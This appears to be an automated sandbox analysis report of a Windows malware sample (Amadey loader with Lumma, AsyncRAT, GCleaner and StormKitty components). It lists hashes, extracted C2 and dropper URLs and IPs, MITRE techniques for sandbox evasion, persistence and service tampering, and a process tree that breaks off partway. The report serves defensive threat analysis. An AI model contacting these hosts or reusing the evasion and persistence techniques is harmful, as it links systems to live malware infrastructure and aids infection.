amadey | 5425d13dc4d180558e58648cdc20802f8f6b28d2b2ab97f0863f0cc9b5ea9b1a

Analysis

max time kernel
150s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
04/04/2025, 08:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

6.2MB
MD5

1b5f0c86f872a363c57c5721f5667485
SHA1

d8a1b169e55085ae83c5325719bf026603a04edc
SHA256

5425d13dc4d180558e58648cdc20802f8f6b28d2b2ab97f0863f0cc9b5ea9b1a
SHA512

9a05fffd35f505630193a47d52bfbd9640ace6c35d7b86f35ff5e3e169c8f0b66c94f26cdd9e90b6fbecf819be9a46a2ff4cef2d16463ac52b1ce14a5513a0c7
SSDEEP

98304:dI2ZVPIbFLUEYdnY8yHA0ekB8ziVBPn1zkGILuLJfefTa0GGO7FR8PiCE2WNVDG:dlvPsFLodn18/uzAnWboJfexBOc620S

Score

10^/10

amadey asyncrat gcleaner lumma stormkitty 092155 defense_evasion discovery execution exploit loader persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://rlxspoty.run/nogoaz

https://jrxsafer.top/shpaoz

https://xuzkrxspint.digital/kendwz

https://99rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://xrfxcaseq.live/gspaz

https://hywmedici.top/noagis

https://synmedsp.live/lzkdj

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://sspacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://0scenarisacri.top/gHSAYuqo

https://njrxsafer.top/shpaoz

https://zkrxspint.digital/kendwz

https://rhxhube.run/pogrs

Extracted

Family

gcleaner

185.156.73.98

45.91.200.135

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral1/memory/6084-100-0x0000000000400000-0x000000000073E000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1o70A3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2T8895.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6dae441910.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	11b30bdb42.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempOULEWE2LRAMPBAII1QA1VMCNWO4UTOT2.EXE

Blocklisted process makes network request 1 IoCs

flow	pid	Process
103	6088	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
6088	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 10 IoCs

flow	pid	Process
73	3956	rapes.exe
73	3956	rapes.exe
73	3956	rapes.exe
73	3956	rapes.exe
73	3956	rapes.exe
73	3956	rapes.exe
73	3956	rapes.exe
73	3956	rapes.exe
35	3956	rapes.exe
103	6088	powershell.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2240	takeown.exe
5772	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1o70A3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2T8895.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	11b30bdb42.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1o70A3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2T8895.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6dae441910.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6dae441910.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempOULEWE2LRAMPBAII1QA1VMCNWO4UTOT2.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempOULEWE2LRAMPBAII1QA1VMCNWO4UTOT2.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	11b30bdb42.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	larBxd7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	262.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	262.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	1o70A3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	rapes.exe

Executes dropped EXE 23 IoCs

pid	Process
1064	x9b14.exe
876	1o70A3.exe
3956	rapes.exe
4100	2T8895.exe
936	rapes.exe
5228	rapes.exe
908	neww.exe
3284	neww.exe
4344	larBxd7.exe
1572	QWWouxX.exe
4372	Jordan.com
4884	ICQ0sog.exe
6132	apple.exe
3796	262.exe
3140	262.exe
5756	qhjMWht.exe
2940	8e39410225.exe
4344	6dae441910.exe
4108	TempOULEWE2LRAMPBAII1QA1VMCNWO4UTOT2.EXE
3448	b38033bd51.exe
2920	rapes.exe
2176	svchost015.exe
5744	11b30bdb42.exe

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	6dae441910.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	TempOULEWE2LRAMPBAII1QA1VMCNWO4UTOT2.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	11b30bdb42.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	1o70A3.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	2T8895.exe

Loads dropped DLL 10 IoCs

pid	Process
3284	neww.exe
3284	neww.exe
3284	neww.exe
3284	neww.exe
3284	neww.exe
3284	neww.exe
3284	neww.exe
3284	neww.exe
3284	neww.exe
3284	neww.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2240	takeown.exe
5772	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	x9b14.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	random.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000900000002437d-559.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2500	tasklist.exe
1232	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
876	1o70A3.exe
3956	rapes.exe
4100	2T8895.exe
936	rapes.exe
5228	rapes.exe
4344	6dae441910.exe
4108	TempOULEWE2LRAMPBAII1QA1VMCNWO4UTOT2.EXE
2920	rapes.exe
5744	11b30bdb42.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3284 set thread context of 6084	3284	neww.exe	122
PID 4884 set thread context of 4940	4884	ICQ0sog.exe	142
PID 3448 set thread context of 2176	3448	b38033bd51.exe	224

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\GentleOklahoma	larBxd7.exe
File opened for modification	C:\Windows\ModularVol	larBxd7.exe
File opened for modification	C:\Windows\LowerOrgasm	larBxd7.exe
File created	C:\Windows\Tasks\rapes.job	1o70A3.exe
File opened for modification	C:\Windows\GovernmentalOttawa	larBxd7.exe
File opened for modification	C:\Windows\AmongDouble	larBxd7.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1588	sc.exe
1200	sc.exe
1824	sc.exe
4000	sc.exe
5300	sc.exe
2844	sc.exe
4424	sc.exe
4312	sc.exe
4560	sc.exe
4520	sc.exe
6084	sc.exe
5104	sc.exe
3932	sc.exe
5484	sc.exe
5980	sc.exe
948	sc.exe
952	sc.exe
4508	sc.exe
1220	sc.exe
3980	sc.exe
1548	sc.exe
3800	sc.exe
5920	sc.exe
3020	sc.exe
4392	sc.exe
460	sc.exe
1756	sc.exe
1860	sc.exe
3672	sc.exe
2956	sc.exe
3148	sc.exe
3844	sc.exe
1032	sc.exe
5704	sc.exe
4224	sc.exe
1148	sc.exe
3896	sc.exe
836	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2768	6084	WerFault.exe	122

System Location Discovery: System Language Discovery 1 TTPs 35 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qhjMWht.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1o70A3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	QWWouxX.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6dae441910.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2T8895.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	262.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x9b14.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8e39410225.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	larBxd7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Jordan.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	262.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b38033bd51.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempOULEWE2LRAMPBAII1QA1VMCNWO4UTOT2.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11b30bdb42.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2920	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4784	schtasks.exe

Suspicious behavior: EnumeratesProcesses 55 IoCs

pid	Process
876	1o70A3.exe
876	1o70A3.exe
3956	rapes.exe
3956	rapes.exe
4100	2T8895.exe
4100	2T8895.exe
4100	2T8895.exe
4100	2T8895.exe
4100	2T8895.exe
4100	2T8895.exe
936	rapes.exe
936	rapes.exe
5228	rapes.exe
5228	rapes.exe
4372	Jordan.com
4372	Jordan.com
4372	Jordan.com
4372	Jordan.com
4372	Jordan.com
4372	Jordan.com
1572	QWWouxX.exe
1572	QWWouxX.exe
1572	QWWouxX.exe
1572	QWWouxX.exe
1572	QWWouxX.exe
1572	QWWouxX.exe
4940	MSBuild.exe
4940	MSBuild.exe
4940	MSBuild.exe
4940	MSBuild.exe
5756	qhjMWht.exe
5756	qhjMWht.exe
5756	qhjMWht.exe
5756	qhjMWht.exe
5756	qhjMWht.exe
5756	qhjMWht.exe
6088	powershell.exe
6088	powershell.exe
6088	powershell.exe
4372	Jordan.com
4372	Jordan.com
4372	Jordan.com
4372	Jordan.com
4344	6dae441910.exe
4344	6dae441910.exe
4108	TempOULEWE2LRAMPBAII1QA1VMCNWO4UTOT2.EXE
4108	TempOULEWE2LRAMPBAII1QA1VMCNWO4UTOT2.EXE
4344	6dae441910.exe
4344	6dae441910.exe
4344	6dae441910.exe
4344	6dae441910.exe
2920	rapes.exe
2920	rapes.exe
5744	11b30bdb42.exe
5744	11b30bdb42.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
664	Process not Found
664	Process not Found

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeRestorePrivilege	3284	neww.exe
Token: SeBackupPrivilege	3284	neww.exe
Token: SeDebugPrivilege	3284	neww.exe
Token: SeDebugPrivilege	6084	AddInProcess32.exe
Token: SeIncreaseQuotaPrivilege	6084	AddInProcess32.exe
Token: SeSecurityPrivilege	6084	AddInProcess32.exe
Token: SeTakeOwnershipPrivilege	6084	AddInProcess32.exe
Token: SeLoadDriverPrivilege	6084	AddInProcess32.exe
Token: SeSystemProfilePrivilege	6084	AddInProcess32.exe
Token: SeSystemtimePrivilege	6084	AddInProcess32.exe
Token: SeProfSingleProcessPrivilege	6084	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	6084	AddInProcess32.exe
Token: SeCreatePagefilePrivilege	6084	AddInProcess32.exe
Token: SeBackupPrivilege	6084	AddInProcess32.exe
Token: SeRestorePrivilege	6084	AddInProcess32.exe
Token: SeShutdownPrivilege	6084	AddInProcess32.exe
Token: SeDebugPrivilege	6084	AddInProcess32.exe
Token: SeSystemEnvironmentPrivilege	6084	AddInProcess32.exe
Token: SeRemoteShutdownPrivilege	6084	AddInProcess32.exe
Token: SeUndockPrivilege	6084	AddInProcess32.exe
Token: SeManageVolumePrivilege	6084	AddInProcess32.exe
Token: 33	6084	AddInProcess32.exe
Token: 34	6084	AddInProcess32.exe
Token: 35	6084	AddInProcess32.exe
Token: 36	6084	AddInProcess32.exe
Token: SeIncreaseQuotaPrivilege	6084	AddInProcess32.exe
Token: SeSecurityPrivilege	6084	AddInProcess32.exe
Token: SeTakeOwnershipPrivilege	6084	AddInProcess32.exe
Token: SeLoadDriverPrivilege	6084	AddInProcess32.exe
Token: SeSystemProfilePrivilege	6084	AddInProcess32.exe
Token: SeSystemtimePrivilege	6084	AddInProcess32.exe
Token: SeProfSingleProcessPrivilege	6084	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	6084	AddInProcess32.exe
Token: SeCreatePagefilePrivilege	6084	AddInProcess32.exe
Token: SeBackupPrivilege	6084	AddInProcess32.exe
Token: SeRestorePrivilege	6084	AddInProcess32.exe
Token: SeShutdownPrivilege	6084	AddInProcess32.exe
Token: SeDebugPrivilege	6084	AddInProcess32.exe
Token: SeSystemEnvironmentPrivilege	6084	AddInProcess32.exe
Token: SeRemoteShutdownPrivilege	6084	AddInProcess32.exe
Token: SeUndockPrivilege	6084	AddInProcess32.exe
Token: SeManageVolumePrivilege	6084	AddInProcess32.exe
Token: 33	6084	AddInProcess32.exe
Token: 34	6084	AddInProcess32.exe
Token: 35	6084	AddInProcess32.exe
Token: 36	6084	AddInProcess32.exe
Token: SeDebugPrivilege	2500	tasklist.exe
Token: SeDebugPrivilege	1232	tasklist.exe
Token: SeDebugPrivilege	6088	powershell.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
4372	Jordan.com
4372	Jordan.com
4372	Jordan.com
2940	8e39410225.exe
2940	8e39410225.exe
2940	8e39410225.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
4372	Jordan.com
4372	Jordan.com
4372	Jordan.com
2940	8e39410225.exe
2940	8e39410225.exe
2940	8e39410225.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5916 wrote to memory of 1064	5916	random.exe	88
PID 5916 wrote to memory of 1064	5916	random.exe	88
PID 5916 wrote to memory of 1064	5916	random.exe	88
PID 1064 wrote to memory of 876	1064	x9b14.exe	90
PID 1064 wrote to memory of 876	1064	x9b14.exe	90
PID 1064 wrote to memory of 876	1064	x9b14.exe	90
PID 4224 wrote to memory of 644	4224	cmd.exe	92
PID 4224 wrote to memory of 644	4224	cmd.exe	92
PID 836 wrote to memory of 2540	836	cmd.exe	93
PID 836 wrote to memory of 2540	836	cmd.exe	93
PID 876 wrote to memory of 3956	876	1o70A3.exe	97
PID 876 wrote to memory of 3956	876	1o70A3.exe	97
PID 876 wrote to memory of 3956	876	1o70A3.exe	97
PID 1064 wrote to memory of 4100	1064	x9b14.exe	98
PID 1064 wrote to memory of 4100	1064	x9b14.exe	98
PID 1064 wrote to memory of 4100	1064	x9b14.exe	98
PID 3956 wrote to memory of 908	3956	rapes.exe	118
PID 3956 wrote to memory of 908	3956	rapes.exe	118
PID 908 wrote to memory of 3284	908	neww.exe	120
PID 908 wrote to memory of 3284	908	neww.exe	120
PID 3284 wrote to memory of 5816	3284	neww.exe	121
PID 3284 wrote to memory of 5816	3284	neww.exe	121
PID 3284 wrote to memory of 5816	3284	neww.exe	121
PID 3284 wrote to memory of 6084	3284	neww.exe	122
PID 3284 wrote to memory of 6084	3284	neww.exe	122
PID 3284 wrote to memory of 6084	3284	neww.exe	122
PID 3284 wrote to memory of 6084	3284	neww.exe	122
PID 3284 wrote to memory of 6084	3284	neww.exe	122
PID 3284 wrote to memory of 6084	3284	neww.exe	122
PID 3284 wrote to memory of 6084	3284	neww.exe	122
PID 3284 wrote to memory of 6084	3284	neww.exe	122
PID 3956 wrote to memory of 4344	3956	rapes.exe	123
PID 3956 wrote to memory of 4344	3956	rapes.exe	123
PID 3956 wrote to memory of 4344	3956	rapes.exe	123
PID 4344 wrote to memory of 5112	4344	larBxd7.exe	124
PID 4344 wrote to memory of 5112	4344	larBxd7.exe	124
PID 4344 wrote to memory of 5112	4344	larBxd7.exe	124
PID 5112 wrote to memory of 2500	5112	cmd.exe	129
PID 5112 wrote to memory of 2500	5112	cmd.exe	129
PID 5112 wrote to memory of 2500	5112	cmd.exe	129
PID 5112 wrote to memory of 4220	5112	cmd.exe	130
PID 5112 wrote to memory of 4220	5112	cmd.exe	130
PID 5112 wrote to memory of 4220	5112	cmd.exe	130
PID 5112 wrote to memory of 1232	5112	cmd.exe	131
PID 5112 wrote to memory of 1232	5112	cmd.exe	131
PID 5112 wrote to memory of 1232	5112	cmd.exe	131
PID 5112 wrote to memory of 2288	5112	cmd.exe	132
PID 5112 wrote to memory of 2288	5112	cmd.exe	132
PID 5112 wrote to memory of 2288	5112	cmd.exe	132
PID 5112 wrote to memory of 4008	5112	cmd.exe	133
PID 5112 wrote to memory of 4008	5112	cmd.exe	133
PID 5112 wrote to memory of 4008	5112	cmd.exe	133
PID 5112 wrote to memory of 2472	5112	cmd.exe	134
PID 5112 wrote to memory of 2472	5112	cmd.exe	134
PID 5112 wrote to memory of 2472	5112	cmd.exe	134
PID 5112 wrote to memory of 320	5112	cmd.exe	135
PID 5112 wrote to memory of 320	5112	cmd.exe	135
PID 5112 wrote to memory of 320	5112	cmd.exe	135
PID 5112 wrote to memory of 4784	5112	cmd.exe	136
PID 5112 wrote to memory of 4784	5112	cmd.exe	136
PID 5112 wrote to memory of 4784	5112	cmd.exe	136
PID 3956 wrote to memory of 1572	3956	rapes.exe	137
PID 3956 wrote to memory of 1572	3956	rapes.exe	137
PID 3956 wrote to memory of 1572	3956	rapes.exe	137

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5916
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x9b14.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x9b14.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1064
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1o70A3.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1o70A3.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3956
    - - C:\Users\Admin\AppData\Local\Temp\10434090101\neww.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10434090101\neww.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:908
      - C:\Users\Admin\AppData\Local\Temp\cc8dcbe351ac70e22ca77fe0b074ff92\neww.exe
        
        C:\Users\Admin\AppData\Local\Temp\cc8dcbe351ac70e22ca77fe0b074ff92\neww.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3284
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        7⤵
        
        PID:5816
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6084
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 1304
        8⤵
        Program crash
        
        PID:2768
    - - C:\Users\Admin\AppData\Local\Temp\10434400101\larBxd7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10434400101\larBxd7.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
